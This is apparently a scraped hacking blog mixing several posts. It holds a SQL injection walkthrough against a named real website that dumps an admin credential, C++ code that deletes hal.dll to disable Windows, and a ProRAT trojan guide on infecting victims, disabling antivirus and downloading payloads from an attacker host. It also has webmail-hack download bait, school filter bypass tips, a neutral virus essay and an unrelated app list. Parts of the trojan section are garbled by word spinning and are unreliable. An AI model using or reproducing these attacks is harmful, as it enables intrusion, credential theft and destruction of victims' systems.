On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because, 97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn’t have more than 100 columns at the most in its database. So by entering the number 6753, you are trying to make it sure if the website gives you an error with it. IF it does that means you can proceed further. To check an SQL Injection, its mandatory that the website should be pointing it self to some specific page, i.e. “website.com/index.php?page=11″. So in this case the website is pointing it self to page Number.11 to pull up some specific information. So, to check if the website is vulnerable or not, you can try with the following URL. i.e. “website.com/index.php?page=11+order+by+6753″.

2. How would i find the vulnerable websites?
A.: Google is the best friend of Hackers
, when I say this don’t assume that i am just writing it because i am supposed it. I really mean it. There is something called as “google dorks”, which are basically a command which could be put into the Google search to find out specific groups of pages.
here are some Google dorks which you may try to find out the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

This will help you to find out the websites which are connected and working with SQL Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to put “order+by+6753″ at the end of the URL to check if its vulnerable.

Step 1 : Finding Vulnerable Page.

Lets start, as you’ll know the website that i will test today is www.RfidUpdate.com. So lets open up the website in the browser. So just a little information about website, RFID means “radio frequency identification”. So on the right hand side you will see that it gives you an opportunity to subscribe to the website. So now it should give you an idea that when you subscribe to it, there has to be a place where your E-mail address should be saved, so it has to have a database! So, now we know that the website is supported by an SQL Database at the backend. So we are on the right track.

As I have written earlier, in order to perform an SQL Injection we will have to find a page that has “something.php?id=2121″ at the end of the URL, so we will try to find such page on RfidUpdate.com. I have found a page by exploring the website a bit. The URL of the page is,

http://www.rfidupdate.com/articles/index.php?id=1563


Image 1: SQL Injection (Click to enlarge )

So now, we know it has an SQL Database and we have the apge where we can start with.

So lets try to check if the website is vulnerable to SQL Attack, we will try to add “+order+by+6753–” as i have written earlier.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753–

Now, you should have noticed an error, which says :
“Error 1054: Unknown column ‘6753′ in ‘order clause’”

So, It means that the database gave u a message saying “there is no such column”. So error doesn’t really make any difference, but the main thing we should notice is that the database communicated with us directly. So there is a possibility that we can exploit it.

Step 2 : Finding Number of Columns.

Now, the next thing we will try is to find the out many columns do this page have. So now, instead of “6753″, we will start from number 1 then 5 then 15, we will keep doing this unless we get some error. So, try the following url.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1–

The webpage opened up fine, which means that the website has more then 1 column, now try number 5.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5–

Same thing, now try 10.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10–

Still no error, try 15.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15–

Still no error :( , try 20.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20--

WHOA!, We got the error, which means that the number of columns in the webpage is between 15 to 20. So lets try with number “16″ now.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16–

YAY!, you got the error on number “16″ as well. Which means, that the website has 15 columns. So now lets move further.

Step 3 : Using “Union Select All” Command.

Now, we will try to combine all the columns and we will see what do we get, the command goes as follow:-

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–


Image 2: SQL Injection (Click to enlarge )

FYI:- please notice tha ti have added “-” before 1563.

Now you see some broken things in there, and now you see that the only indipendent number of column you see on the website is “7″. So apperantly that would be the base of the attack. Everything we do now, would be done with the column number “7″.

So we wil ltry to find the some more information about the DATABASE this website is using, so to do this we can replace the column number 7 with “@@version“, without quotes ofcourse. So try this now.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–


This is what you should see now,
5.0.67-community

Which means, that the website is using SQL Version > 5. Now, try following URL to move further.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from%20information_schema.tables%20where%20table_Schema=database%20()–

Here, we have replaced No.7 column with “group_concat(table_name)” and we have added “from information_schema.tables where table_Schema=database ()” at the end. Which are basically the standard commands for SQL, to get the further information from the specific column.

YAY! You should have already noticed that the name of the further columns have appeared in the list and one of them is “ru_Admin”. Thats what we are looking for. Since we have the column for admin now, we will try to find out the username and password out of it. So let try following URL into the address bar.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from%20information_schema.columns%20where%20table_Schema=database%20()–

The only thing we’ve changed here is the “tables” to “columns”, and you should see all the information about the admin’s tables now which should look something like following.

“ru_Admin_Username,ru_Admin_Password”

So we see, we might be able to crack the username as well as the password. In order to see the information inside the username and the password column lets put following URL:

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0×3a,ru_Admin_password),8,9,10,11,12,13,14,15+from%20ru_Admin–

What we did is, to replace the columns names with admin_username & admin_password, and call it from ru_Admin column at the end.


VOILA! What you’re looking at right now the “admin” username and the password in following format.

username : password.

admin:admRIvuxHahkQ

FYI: Wherever you see “%20″ in the URL, that means a SPACE in the address bar.

So you have the password now, you can use it the way you want!.

So this the way to perform an SQL Injection attack. You may try your own stuffs with the google dorks i posted in the beginning. Use it the way you want, just keep in mind that if u know 80/100, there are people out there who know 90/100. So better secure your self first, and try these attacks with the permission of the site owners.

Thank you all for reading this tutorial, I am sure it helped. If there are any more questions feel free to revert back to the same post.

Enjoy Ethical hacking ;)


21 Online Free Web Based Applications That You Probably Would Love To Use Every Day!

| |

Today, we are listing 21 free and online web based applications which are very helpful for you to process your daily work. If you are designer, developer, office worker, manager, supervisor, student, home user, etc." class="ver">etc but we make sure to add something interesting for everyone. Most of them are not very well but, or begin a new sentence." class="ver">known but they are really amazing in respect to their features. Just take a look at them and share your thoughts here.

You are welcome to share if you know about any free web based application which our readers may like.

Phonevite
phonevite
Sending reminders and alerts, with your own voice, is easy and simple using Phonevite™. With this tool, you can send free phone reminders & alerts to yourself and/or your friends in 3 quick, easy steps.

Google Docs
google docs
You can import your existing documents, spreadsheets and presentations, or create new ones from scratch. Invite people to your documents and make changes together, at the same time. All you need is a Web browser.

crazyegg - visualize your visitors
crazyegg
Crazy Egg will help you improve the design of your site by showing you where people are clicking and where they are not.

Windows Live OneCare safety scanner
windows live one care
Windows Live OneCare safety scanner is a free service designed to help ensure the health of your PC.

hooeey - Record, retrieve and analyze your web hops
hooeey
hooeey is a personal web application that records all web links that you browse and lets you use them in a fun and productive way.

vuzit
vuzit
Vuzit is a web based document viewer you can embed in any web page. It’s fast to add and it’s free!

codepaste
codepaste
CodePaste provides an easy and convenient way to send/share PHP, C++, Javascript, Java, CSS, Actionscript and HTML code with others. Copy and paste the code and enter the email where you want the CodePaste to send it. CodePaste then nicely formats the code and sends it over.

Sprout Builder
Sprout
Sprout is the quick and easy way for anyone to build, publish, and manage widgets, mini-sites, mashups, banners and more.

infoencrypt - Online service for easy encrypt messages
infoencrypt
This is service for securing your messages in an easy way. All you need is only to enter a message text of your message and encryption password. The password will be used for both encryption and decryption. The system will encrypt your message using strong encryption algorithm, and it will be secure for sending. Anyone who intercepts the encrypted message without password will not be able to read original message.

Premier Survey
premiersurvey
Free survey software for online surveys, web surveys, email surveys. Free Online survey software for customer satisfaction surveys, employee satisfaction surveys, market research surveys.

Primo Online
Primo-online
PrimoOnline provides a super-fast way to create PDF files online, without the need to install any PDF software. Simply upload your file, enter your email address, and our server-based PDF creator will quickly convert it to PDF and deliver it straight to your email inbox.

postica - stick it! Create and share sticky notes
postica
Postica lets you create sticky notes, attach a file, and share them with your friends.

TinySong
tinysong
TinySong allows you to quickly share music links with your friends.

Adobe Buzzword
Adobe Buzzword
Adobe® Buzzword® is a new online word processor, perfect for writing reports, proposals, and anything else you need to access online or work on with others. It looks and behaves like your normal desktop word processor, but it operates inside a web browser, so there’s no installation required.

ShrinkFile.NET
shrink file
ShrinkFile.net is a free resource to compress your text documents, images, PDF files and other data online, because some computers don’t have WinZip or WinRAR installed. ShrinkFile.net will host the uploaded content at a static URL for one week, allowing you to share the file with family and friends.

Awesome Highlighter
Awesome Highlighter
Awesome Highlighter lets you highlight text on web pages and then gives you a small link to the highlighted page.

CreativePro Office
creative pro office
CreativePro Office is the most complete set of online office management tools you’re likely to find at any price - and it’s completely free! Manage your team, clients, projects, invoices, events from one web-based application.

ConceptDraw
ConceptDraw
ConceptDraw Visio File Converter is a free web service, provided by Computer Systems Odessa that is available to anyone who uses diagramming software and has a requirement to open Visio (VSD) documents. This service have been created because Visio users often don’t save their drawing into Visio XML (VDX) file format.

Hide My Ass
Hide My Ass
An anonymous free proxy service aimed at hiding your online identity. Use our service to hide your IP address and bypass your work/school web filter with ease.

RescueTime
rescue time
RescueTime is time management software that helps individuals and businesses understand how they spend their time, and provides tools to help them spend it more productively.

Picnik
Picnik
Picnik makes your photos fabulous with easy to use yet powerful editing tools. Tweak to your heart’s content, then get creative with oodles of effects, fonts, shapes, and frames.


WebMail Hack Tutorial Full Guide Vedio + Free Download

| |

WebMail Hack software with proof






Web Mail Hack 2.5v - Free videos are just a click away

Note: Please follow the septs carefully.

Watch full video for the instruction of the webmail hack, to know how to use the software

Before you run the Webmail hack you need to install Windows installer 3.1

CLICK HERE TO DOWNLOAD

and also required .Net Frame Works 3.5 to run the webmail hack

download link is available hear (197MB) .Net Frameworks 3.5 setup CLICK HERE

Here is the download link for Webmail Hack 2.4v:

CLICK HERE

People from US please Download from Uploading.com

Keygen 4 Webmail Hack 2.4v:

CLICK HERE it will ask to complete some offer just ignore and

please sign up below both the links and send your user id you will get the KEY with in 12hr.

CLICK HERE and register and complete at least one offer (free)

CLICK HERE and RegistEr(free) you need to upload atleast one file it could be any file any size.

once you though this process i could see your user name so please send both the user id's to below email ID, you will get the key .


POWERFUL C++ VIRUS Tutorial Full Guide Vedio

| |








This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

Code:

#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.


Virus Maker Tutorial Full Guide Vedio + Free Download Tool

| |








This Incridable Virus Maker is 100% Free and I Love it.

This Program is made by D1sr3p41r3ds

I want to share it with you all!! If i got it wrong , Contact ME!


Reality of Virus

| |

A computer virus is a program which intentionally makes copies of itself. It may contain some sort of "payload", which can be destructive or non-destructive program code, that is activated and run when certain conditions are fulfilled.

Legality of Viruses

The laws about writing and releasing viruses vary from country to country and state to state. In the US there are both Federal and State laws preventing damage to data and property, and these ensure that virus writers whose viruses infect large numbers of computers pay the penalty. David Smith, writer of the infamous Melissa MACRO virus, has been successfully prosecuted and awaits sentencing, with a possible fine of anything up to $150,000 and up to 10 years in prison.

In the UK the Computer Misuse Act makes it illegal to modify a computer without authorization, and this was successfully used to prosecute the author of the SMEG virus Christopher Pile, AKA the Black Baron, who received a total of 18 months in prison. During sentencing the judge commented that "those who seek to wreak mindless havoc on one of the vital tools of our age cannot expect lenient treatment". Not every country is so active in finding and prosecuting virus writers, however. A Taiwanese university only reprimanded and demoted the author of the highly destructive and costly CIH virus. Even just collecting viruses, passing source code and writing viruses for non-destructive purposes is illegal in some places, and any wannabe virus writer needs to understand the implications of the law, wherever they are based.

From a more hackish viewpoint I can understand the attraction of looking at the theory of virus writing, the appeal of studying virus source code to see how viruses work, the thrill of capturing and disassembling live viruses, and even, to some extent, the pride felt when writing a new virus as "proof of concept". All of this is fine, as it combines a very healthy curiosity coupled with sound technical skills, something that draws respect from hackers the world over. But, and it's a very big "but", the juvenile egotistic idiots who release these viruses "in the wild", often with their handle and the name of their group in it, have crossed the ethical border that distinguishes hacking from crime.

On a more personal note, I resent the amount of time wasted cleaning up networks of PCs after an infection, evaluating anti-virus software, installing anti-virus software and updating signature files - time that could have been put to more productive use, like hacking. Anyone who chooses to write a virus had better be sure that it never escapes, because if it causes major damage and the police break in their door, the authorities are not going to be convinced by any lame argument about "proof of concept".




How does a Virus Work?

Most viruses are written in assembly code for a specific computer and tightly tied to the operating system of the target computer. This enables them to protect themselves while continuing to spread the viral infection. But viruses don't have to be written in assembly language, and the growth of sophisticated programming languages embedded inside large software packages has allowed the spread of so-called "MACRO" viruses, which infect documents rather than programs.

Nearly everyone gets a virus from time to time, especially when they share floppy disks with friends. But if anyone starts downloading hacker tools from that hot new hacking web site, or start using warez from some dodgy ftp server, then they had better make sure that they have adequate anti-virus (A/V) protection. Although millions of computers are infected with viruses every year, the majority of cases are due to a small handful of persistent offenders out of the estimated 8,000 viruses in the wild.

Anti-virus software detects and removes viruses either by looking for a "viral signature", a string of bytes unique to that virus, or by using heuristic rules to look for "viral behaviour" which may indicate a program seeking to infect other files or cause destructive behaviour. The A/V software will have been programmed to understand how the virus detected hides itself, and will "clean" the infected file, boot sector or document thus removing the virus from the system.




Types of Virus

  • A "boot sector" virus occupies the boot sector of a floppy or hard disk and loads itself into memory during the boot-up sequence. Once in memory, it will attempt to infect the boot sector of any floppy disk used in the computer.
  • An "executable load" virus is a type of virus which attaches itself to executable files and runs when the program is started. Once in memory, it will attempt to infect other program files by attaching itself to them.
  • A "polymorphic virus" is a virus which encrypts itself, changing its viral "signature" each time using a "mutation engine" in an attempt to evade detection and destruction.
  • A "MACRO" virus is one which is written in a programming language embedded inside another program, such as a word processor. The commonest program suite targeted by MACRO viruses is the Microsoft Office group of applications, with the "Concept" and "LaRoux" viruses targeting Word and Excel, but any program which hosts a complex embedded macro programming language could be used to write such a virus.

Types of Payload

  • Viruses with non-destructive payloads play tunes, display banner messages or pop-up messages without causing any data loss, but they are a distraction, and they still need to be removed
  • Random destruction, where the virus changes odd bytes on disk or in memory, alters keystrokes at random, or messes around with the display.
  • Heavy destruction - the virus can cause the destruction of hard or floppy disks by low-level format, or data loss by wiping out a PC's File Allocation Table (FAT).
  • A new generation of viruses have a payload of Network Exploitation, use the Internet to copy themselves, and are more like "worms" than viruses. The notorious Melissa virus, which spread to a large number of computers in 1999, worked by infecting Microsoft Word97 documents then using Microsoft Outlook email software to email itself as an attachment to 50 people chosen from the infected user's email address book.

Getting Infected

Here are some of the ways of getting infected by a virus. Good A/V counter-measures start by recognizing the risk of infection from each source and taking appropriate steps in prevention.

  • The commonest cause of infection is shared floppy disks, but archive tapes and CD-ROMs can also be infected.
  • Any form of pirate software or warez, either downloaded from the Internet or BBSs, purchased or swapped with other warez traders.
  • Freeware or shareware software from a bulletin board, sometimes even when it appears to be from a trusted source.
  • Freeware or shareware from sources on the Internet, even when it appears to be from a trusted source.
  • Any form of email attachments, either programs or documents, are now suspect.



Virus Protection

Preventing viruses from attacking your system is a mixture of commonsense reasoning with some down-to-earth practical precautions, mixed with the use of one or more anti-virus packages to routinely check your system for infection. The level of protection you decide upon will depend on how much you would feel the loss of data if you were infected, and how much time you would spend cleaning up after the infection. A business user with many PCs and business-critical data at stake will be prepared to spend far more on A/V protection than the average home user, because the sums at risk are so much greater. Using appropriate anti-virus protection is at least as important in preventing catastrophic data loss as the backups you make routinely. (You *do* make backups, don't you?)

Commonsense Precautions


  • Never use pirate software or warez - not only is it illegal, but you don't know where it's been, or what might be lurking in there.
  • Always scan all freeware and shareware before use, even when it comes from what appears to be a reputable source.
  • Always scan all Internet downloads before installing and running, even when they appear to be from a reliable archive site.
  • Ensure that you scan all floppy disks you are given before use. This includes shared disks, pre-formatted blank disks and even distribution disks with original software on. Write-protect disks when not in use to prevent accidental infection.
  • Never run programs attached to email before scanning, even when you are sure they come from a trusted source. Save them and scan them before running or installing them.
  • Always scan any document attached to email before opening, or save the attachment and turn off macro features in the program you are using before opening it.
  • CD-ROMs and CD-RW disks should be scanned if your software allows it, but you will not be able to disinfect if you find a virus.
  • Make sure that you always have an updated signature file for your A/V package. This will ensure optimal A/V protection with signature-based A/V software.
  • Use more than one A/V package if you can, as there is a tendency for A/V packages to detect some viruses and miss others. Using multiple packages increases your chance of detecting something nasty before the infection spreads.
  • Make sure that you back up your data regularly and that you can restore successfully. Ensure that you have a virus-free boot disk to boot from in case of infection, and that you also have virus-free disks containing any tools or device drivers you need to recover your data and rebuild your system.

Using an Anti-Virus Package

If you haven't got an anti-virus package already, then you should. There are many around, both free and commercial. Try F-Prot if you need a free virus package, or get hold of free evaluation copies of commercial products such as Symantec's Norton Anti-Virus, McAfee's VirusScan, or ThunderByte and then buy the one you prefer. If you are protecting corporate data, you need to look at some of the disk control mechanisms available such as Reflex Magnetic's DiskNet, and also scan incoming email using a product such as MimeSweeper. There are many alternative products on the market, and you need to assess your degree of risk before evaluating the products to find one that suits you.

Once you have your anti-virus package, make sure that your machine is virus-free *before* installing the package, and then make sure that the signature file is always up to date. Some packages will automatically attach to the Internet at periodic intervals to download the latest signature file, but if you have read this far in the book you might have your own ideas about the wisdom of that, and would prefer to download the signature file yourself.




Writing Viruses

This section deals with writing viruses, but the reader isn't going to find a general tutorial here, nor will are there any great tips on writing a "killer" virus. As a hacker I don't condone the writing or spreading of viruses, but I have respect for the knowledge, technical skills and level of coding ability needed. What I hope is that by the time anyone who tries to code viruses gets to be *really* good at it, they will have realized that there are more technically challenging problems outside the area of virus development that are both more socially acceptable and better financially rewarded.

Assembling the Tools

If anyone wants to learn how to write a virus, they had better start by "assembling", pun intended, their tools. Here is a list of things someone will need to begin writing viruses:

  • A computer (*doh*), because it is hard to write programs without one!
  • A programming language of some kind, most probably assembly language, not just because viruses are written mostly in assembly language, but also because the novice virus writer will find most source code and tutorials will assume they are using assembly language.
  • A list of the opcodes or assembly mnemonics of the processor which are being targeted. Don't assume that, just because all the books of programming list 126 opcodes for a chip, that means there *are* just 126 opcodes. Some chips have "undocumented" opcodes that don't work right or have weird side effects. The venerable Motorola 6502 chip used in early Apple computers had an undocumented opcode whose mnemonic was HCF - Halt and Catch Fire - because it hosed the CPU.
  • A disassembler which will turn machine code into human-readable assembly language mnemonics. This will enable the novice virus writer to turn any live viruses they capture back into a computer program that they can read and understand.
  • A decent machine code debugger. SoftIce seems to be the favourite for PCs, but it depends on the platform that the virus is being written for.
  • Large and copious amounts of anti-virus software, both to protect themselve and to examine for clues on how to evade detection.

In addition to the basic tools a wannabe virus writer might need to acquire some of the following from the Internet.

Virus Source Code

Anyone can find virus source code in assembly or other languages very easily on the Internet. Once they have the source code, they can read it and understand how that virus works, or can re-assemble it and get a working virus. That's the theory, but a lot of the so-called virus "source" code kicking around the web isn't, and telling the difference between the two isn't easy unless the novice virus writer is already an expert in assembly language. For example, look at this snippet which purports to be from the STONED virus - the part that checks for infection and then infects the computer if not already infected.



PUSH CS
POP DS
MOV SI,200H
MOV DI,0
LODSW
CMP AX,[DI]
JNZ HIDEHD ;Hide real boot sector in hard drive.
LODSW
CMP AX,[DI+2]
JNZ HIDEHD ;Hide real boot sector in hard drive.

Table 10.1: Assembly language fragment of STONED virus which would infect the hard drive of a computer when run


It looks really impressive, doesn't it? Reading through the assembly source code of the STONED virus, which took me less than five minutes to find on the Internet, it looked *real* enough to me. But to someone who's not a full-time assembly language hacker, the code could have been spurious nonsense, designed to send wannabe virus writers down a blind alley. How am I going to find out whether this is real source code or not? The only way of being sure is to feed the assembly language code into an assembler and turn it into an executable binary of machine code. Once anyone has the binary, they can either compare it with a virus from the "wild" or run it and see if it infects their disks.

Virus Writing Tutorials

There are a lot of virus writing tutorials on the Internet, and anyone learning about viruses really wants to find a tutorial that deals with the platform they are coding for, as any example code can be used to get them started. Otherwise, tutorials in any other languages are good for giving a novice virus writer new ideas and concepts if they can follow them.

Some of the tutorials deal with basic concepts, such as the Over Writing virus, which reproduces itself by overwriting the first parts of a program with itself, and carries a destructive payload that kicks in the first time the program is run. Other tutorials deal in depth with stealth viruses which move to escape detection, armoured viruses which have been specifically designed to evade detection by some of the most popular anti-virus software, and polymorphic viruses that use self-encryption on each new generation to prevent their viral signature being detected.

Virus Creation Packages and Mutation Engines

All software writers use tools, and virus writers are no exception. The two most popular tools are "virus creation packages" and "polymorphic mutation engines". These tools are written by the active virus-writing community, and have only one purpose: to enable writers to code viruses quickly, easily and with advanced capabilities.

Polymorphic Mutation Engines

A polymorphic mutation engine is computer code that allows a virus writer to encrypt viruses to prevent them showing a viral signature. The most famous of these is the Mutation Engine written by the Bulgarian Dark Avenger, but virus writers could also run into TridenT Polymorphic Engine, Visible Mutation Engine and many others. Most of these packages are program modules that can be included in other programs to give them the ability to produce polymorphic viruses. By using these packages and including the code into viruses they are writing, novice writers can give even very simple viruses polymorphic capability, enabling them to escape detection.

Virus Creation Packages

Some virus writers have been clever enough to write "virus creation packages" which can generate virus code for users who can't write their own. One such, the sophisticated Virus Creation Lab, offers a full menu-driven virus creation kit, but others such as Virus Construction Set only offer the user a chance to create a pre-canned virus with their own message in it. Viruses that come from creation packages like these will rarely be as sophisticated as viruses written by hand, because virus writing is advancing so quickly that not all virus types can ever be included in a single package. The packages might be of some use to a novice virus writer who wishes to study the code produced, but real virus writers will still prefer to cut their code the old way, and see the creation package user as a script kiddy capable only of running software other smarter hackers have written.

Once again, any systems administrator should always keep an eye out for any of the tools used by Virus writers in case they should appear on the systems they administer. Systems administrators should be aware of activity going on their systems so that they can spot virus source code, tutorials or virus contruction tools before the novice virus writer has got very far. If a systems administrator finds any of these items on a their servers, then a little chat with the user owning those tools would be helpful in determining whether they were present due to natural curiosity or any malicious intent.




The Virus Community

Like every part of the computer community, the virus writers have their own community of mailing and discussion lists, web sites and BBSs. The virus writing community is more hidden and covert than most hacking communities because virus writers have more to lose than most hackers, so what anyone will find on the Internet is just the tip of the iceberg, with 90 per cent of virus writing buried deep underground for fear of exposure and prosecution.

Virus groups such as Phalken/Skism, Kefrens, Team Necrosis and phVX write tutorials and ezines, trade viruses, source code, tools, and make them all available on ftp and web sites for anyone with an interest in virus writing to download. Some of the ezines for the virus-writing community include 40hex magazine, Infected Voice, 29A, * magazine and Crypt Newsletter. If anyone wants to get accepted into the virus community, they must make sure they can code really well and then read the section in the next chapter about getting into the warez community, but trade viruses instead of warez. Hopefully by the time they've learnt to code well enough, they'll have become more interested in something more technically challenging and useful than writing viruses.


How To Make A Fake Virus Tutorial Full Guide Vedio EnjOY!

| |

This is an interesting tutorial in which we will create a fake “virus” which can shutdown, restart and log off your pc(Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking START>TURNOFF button etc….And you can always do a little mischief by sending it to your friends ;)


1Create shortcut,(Right click on your desktop and go to new -> shortcut )
2)After this will appear window and that is where you type the code

There are few variants , this one will shutdown pc .
To log of computer type shutdown -l -t 300 -c “your message”
To restart computer type shutdown -r -t 300 -c ” your message”
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.

3) Click Next, Finish

4) After this will appear icon on desktop, when someone click it, shutdown box will pops up.


Enter email address where you want to receive tutorials when we post them! It’s free!

3)How can I stop system shutdown ? Go to Start->Run , then open cmd,write shutdown -a and press ENTER on keyboard, as shown below


How To Get Into Blocked Websites In School

| |

Let’s assume you’re at school and you’re on the computer. There’s an enormous chance that you have restriction. So you’re browsing and you go to facebook or youtube. And what happens?You can’t access some websites because they are blocked. Damn… What now…

This is really easy, just go to proxy site, type url and click Surf or Go . Proxy Sites do let you to connect to their server first before you reaching to the destination URLs.If you want to know more , Below is list of the proxy sites , which might work for you.

Pricacywanted.info

Netrover.info


How to Hack Using Trojans Tutorial Full Guide Vedio + Free Download

| |








maRATs :

RATs also called as Remote Administration tools are popularly used softwares to control other computer remotely plus considering hacking aspects, hack computer remotely. there’s lots of RATs such as:
Prorat
Turkojan
Yuri RAT plus lots of other.

Working of RATs:

To hack computer remotely using a RAT, you’ve to develop a server plus then send this server to victim whose you want to hack computer remotely. Generally, this server is binded to any file say picture or song, so that whenever victim opens this file on his computer, our server is installed plus this server opens port of victim computer plus by using this opened port, you are able to hack computer remotely.

it is this RAT server that then sends all scheme information to PRORAT plus they can then hack computer remotely using PRORAT.

Things you can do by hacking computer remotely:

five times you gain access to remote computer, you can hack computer remotely plus perform any of following:

Thus, you are able to hack computer remotely 100%. This program to hack computer remotely is hence popular.

Disadvantage of remote hacking program RAT:

The main disadvantage of this program – RAT is that the server created to hack computer remotely is recognized by most antiviruses as hacktool plus hence, antiviruses send alert messages when installing RAT server.
But, there’s lots of softwares like Binders or Crypters to hide RAT server plus prevent antiviruses from sending alerts. Even there’s softwares like AVkiller which is used to turn antivirus inactive plus then our server (used to hack computer remotely) can be installed on victim computer easily.

# Install a keylogger
# Monitor Chat windows
# Shutdown computer remotely
# Take control of scheme registry
# Hack locally stored passwords plus licence keys
# Download additional malware plus servers to gain stronger control
# Control plus access all Control Panel options(including add or remover programs)
# Send various Error messages
# Access Printer services
# Erase all disk data by formatting drives
# Open FTP connection plus start file transaction

This is all about RATs – softwares to hack computer remotely. In my next editorial, i will inform about server creation plus installation on remote computer

PRORAT – Remote computer access program:

1. Download PRORAT software for remote computer access. Password: techotips.blogspot.comAlternative download link for PRORAT program.password: netcrewpassword for prorat v1.9: pro (If netcrew doesn’t work).2. Unzip downloaded file using Winzix (download here) to use this remote computer access software3. Now, the unzipped file will contain Prorat.exe file. Run the file on your computer.4. Now, they have to develop a server to send it to remote computer for remote computer access. So, click on develop ->Create Prorat server.5. Go to no-ip.com plus register for an account.

6. Now, in Pro connective notification, enter in IP(DNS) address, the link provided to you by no-ip plus let all remaining fields remain unchecked.7. Alongwith using Pro connective notification, you can even use your mail address to confirm about server installation.8. You can even bind the server with a specific file to prevent victim knowing about the server installation on his computer.9. To change server default icon, click on “Server icon” on left option pane plus select any suitable icon according to binded file.10. Now, when all things are done, hit on “Create server” plus you will get server created in Prorat directory.

First thing’s first, you’ll charge a apple-pie archetype of Prorat V1.9 actuality is a articulation breadth you can get it from.

http://www.megaupload.com/?d=QNR1BZ3G

This book includes:

ProRat V1.9

The english advice file

Skin packs 1-5

The bark builder

pass: netcrew

Now you accept the all-important files, let’s alpha with the tutorial. Extract ProRat V1.9 and run the ProRat application. We’ll alpha with a ProRat server. Bang actualize abreast the basal and a baby ambience card will arise up, for now let’s aloof accomplish a ProRat server, we’ll awning the added types later.

The ProRat server is the server the rat communicates with, all the fun trojany things :P

The bureaucracy is appealing simple we’ll alpha with the notifications area.

Pro affiliation notification-

this is basically the SIN notification. Breadth it asks for you ip abode aloof bang on the little red half-circle on the ancillary and it will locate your alien ip abode for you.

Mail notification-

self explanitory, the server will accelerate you an email to acquaint you the victim has been infected.

ICQ pager-

If you use ICQ you can be notified of infections via that, put in your UIN and aback a victim is adulterated you will be abreast via ICQ

CGI-

This connects to a web cgi folio and uploads the advice aback a victim is infected

Choose whichever you like, I usually use email and SIN (Pro connective.)

Ok let’s move on to the accepted settings now.

Server Port-

the anchorage you run your server off of (default 5110) For the best allotment you don’t appetite to use the absence port

Server password-

Pick a countersign assure alone you accept access

Victim name-

nothing actual important, aloof so you can accelerate abstracted bodies abstracted servers and be able to analyze each, use whatever you appetite here

Give a affected absurdity message-

when the server is run it displays an absurdity message. You can adapt what it says by beat configure afterwards blockage the box.

Melt server-

After the server is installed the server installer is deleted if checked

Kill AV/Firewall-

when the server is run it kills the Anti-virus and Firewall processes to arrest apprehension if checked

Disable win Xp SP 2….. -

This kills the windows firewall aloft beheading if checked

Clear windows xp restore points-

This will annul all arrangement restore credibility to abstain acclimation the adulterated computer if checked

Don’t accelerate LAN notifications-

this disables notifications if addition aural your arrangement is infected, notifications still assignment from alfresco access aloof not on LAN if checked

Invisibility-

All three of these settings advice to adumbrate the server from the user. I’m not activity to explain them, I’ll aloof acquaint you to leave them all checked

Bind with file-

Allow you to accept a book to bind the server to (this helps anticipate detection)

Server extensions-

Pick the addendum blazon that you want

Server icon-

Pick an icon

So you’ve set all of your settings, now bang on actualize server in the basal appropriate bend and delay a few moments while the affairs builds the server. Go acquisition some suckas that will run it and accord them the file.

Now aback at the capital window of ProRat we’re activity to bang on the little check-box abutting to the R on the bar up top. This footfall is accidental if you didn’t use the pro affiliation notification. This listens for the SIN notifications

Put in the IP abode of your victim and the anchorage the server runs on and bang connect, you’ll be prompted for your password.

Now instead of walking you through this, this is the fun part, arena with your toys, I’ll acquaint you what not to try if you are accomplishing the testing on your own PC

CHAT-

Do not attack this unless you are able for a reboot or you are testing with a server on one computer and the applicant on another.

FUNNY STUFF-

Avoid abutting adviser because you won’t be able to see what you are doing.

Same with accessible screensaver

ok these ar the informations about the added server types

Downloader server-

(copy pasted from prorat, apologetic I’m absolutely tired)

Downloader server’s aim is to affect the victim in an accessible way. ProRat server is 350 kb but Downloader server is aloof alone 2kb. It is easier to accelerate to your victim.

Downloader server’s job is to download and run the absolute server on the ambition PC. It downloads the absolute server in a fast way and executes the book afterwards allurement any questions to your victim. Aback Downloader server is binded with a file, the files admeasurement won’t be too abundant big so your victim will not get apprehensive with the admeasurement of the file.

If you appetite to use Downloader server you charge accept a web hosting and you can additionally use a chargeless hosting. Afterwards this you charge actualize a accustomed server and put it into your web hosting area.

